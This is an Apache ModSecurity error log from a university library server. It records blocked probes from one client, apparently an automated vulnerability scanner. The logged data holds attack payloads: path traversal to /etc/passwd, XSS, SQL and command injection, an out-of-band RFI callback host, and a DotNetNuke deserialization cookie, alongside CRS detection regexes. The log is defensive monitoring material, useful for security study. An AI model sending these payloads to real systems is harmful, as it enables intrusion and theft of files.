[Tue Aug 29 11:42:05.444878 2023] [:error] [pid 1869] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:download. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:download: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13HcCo-f0AAAdNKEsAAAAR"]
[Tue Aug 29 11:42:06.416474 2023] [:error] [pid 1871] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/socialfit/popup.php"] [unique_id "ZO13HsCo-f0AAAdPLxYAAAAT"]
[Tue Aug 29 11:42:07.415568 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13H8Co-f0AAAdb7hYAAAAb"]
[Tue Aug 29 11:42:07.706579 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO13H8Co-f0AAAdV7ZAAAAAa"]
[Tue Aug 29 11:42:08.379714 2023] [:error] [pid 1879] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:service-cmds-peform. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:service-cmds-peform: ||whoami||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/cyrus.index.php"] [unique_id "ZO13IMCo-f0AAAdXIkwAAAAd"]
[Tue Aug 29 11:42:08.382205 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:file: /../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13IMCo-f0AAAdOePIAAAAS"]
[Tue Aug 29 11:42:09.402110 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13IcCo-f0AAAdSZKMAAAAX"]
[Tue Aug 29 11:42:11.365599 2023] [:error] [pid 1880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:sn: ../../WEB-INF/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/brightmail/servlet/com.ve.kavachart.servlet.ChartStream"] [unique_id "ZO13I8Co-f0AAAdYBAUAAAAe"]
[Tue Aug 29 11:42:11.431355 2023] [:error] [pid 1880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13I8Co-f0AAAdYBAcAAAAe"]
[Tue Aug 29 11:42:12.421153 2023] [:error] [pid 1866] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO13JMCo-f0AAAdKXNUAAAAK"]
[Tue Aug 29 11:42:14.351987 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13JsCo-f0AAAdSZK0AAAAX"]
[Tue Aug 29 11:42:14.415729 2023] [:error] [pid 1890] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/filemanager/ajax_calls.php"] [unique_id "ZO13JsCo-f0AAAdi99MAAAAk"]
[Tue Aug 29 11:42:14.433616 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:pg: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/tarantella/cgi-bin/secure/ttawlogin.cgi/"] [unique_id "ZO13JsCo-f0AAAcoNhYAAAAF"]
[Tue Aug 29 11:42:15.407269 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:cat_id: ${system(ls)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO13J8Co-f0AAAbo-bMAAAAi"]
[Tue Aug 29 11:42:17.392445 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page_slug. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page_slug: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13KcCo-f0AAAdV7aQAAAAa"]
[Tue Aug 29 11:42:19.362964 2023] [:error] [pid 1888] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:search_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:search_key: {{1337*1338}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/search"] [unique_id "ZO13K8Co-f0AAAdgyDcAAAAj"]
[Tue Aug 29 11:42:19.398935 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:configuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:configuration: o:10:pma_config:1:{s:6:source s:11:/etc/passwd }"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/scripts/setup.php"] [unique_id "ZO13K8Co-f0AAAc92w4AAAAD"]
[Tue Aug 29 11:42:21.527117 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:classes_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:classes_dir: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/classes/phpmailer/class.cs_phpmailer.php"] [unique_id "ZO13LcCo-f0AAAcvBkMAAAAJ"]
[Tue Aug 29 11:42:23.400273 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/src/addressbook.php"] [unique_id "ZO13L8Co-f0AAAdOeQgAAAAS"]
[Tue Aug 29 11:42:24.428657 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:optpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:optpage: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/src/options.php"] [unique_id "ZO13MMCo-f0AAAdV7bAAAAAa"]
[Tue Aug 29 11:42:25.424563 2023] [:error] [pid 1900] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mailbox: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13McCo-f0AAAdsFgkAAAAo"]
[Tue Aug 29 11:42:26.448419 2023] [:error] [pid 1900] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:where: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13MsCo-f0AAAdsFgsAAAAo"]
[Tue Aug 29 11:42:27.360498 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:chapter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:chapter: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/src/help.php"] [unique_id "ZO13M8Co-f0AAAQSW0AAAAA0"]
[Tue Aug 29 11:42:27.379638 2023] [:error] [pid 1871] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `echo found within ARGS:: `echo cve-2022-33891 | rev`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/doAs"] [unique_id "ZO13M8Co-f0AAAdPLzUAAAAT"]
[Tue Aug 29 11:42:28.413469 2023] [:error] [pid 1899] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:test-head. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:test-head: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/nextgen-gallery/nggallery.php"] [unique_id "ZO13NMCo-f0AAAdrEmsAAAAn"]
[Tue Aug 29 11:42:29.692301 2023] [:error] [pid 1923] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../ found within ARGS:path: /../../Content"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/api/filemanager"] [unique_id "ZO13NcCo-f0AAAeDipIAAAAx"]
[Tue Aug 29 11:42:32.369174 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gwp63ery9znstj.oast.site found within TX:1: cjmnbitjmimt14dgn26gwp63ery9znstj.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO13OMCo-f0AAAdOeRYAAAAS"]
[Tue Aug 29 11:42:32.423495 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:DNNPersonalization. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: MethodName>WriteFile found within REQUEST_COOKIES:DNNPersonalization: <profile><item key=\\x22name1: key1\\x22 type=\\x22System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x22><ExpandedWrapperOfFileSyst [hostname "digilibfkip.unla.ac.id"] [uri "/__"] [unique_id "ZO13OMCo-f0AAAQSW0sAAAA0"]
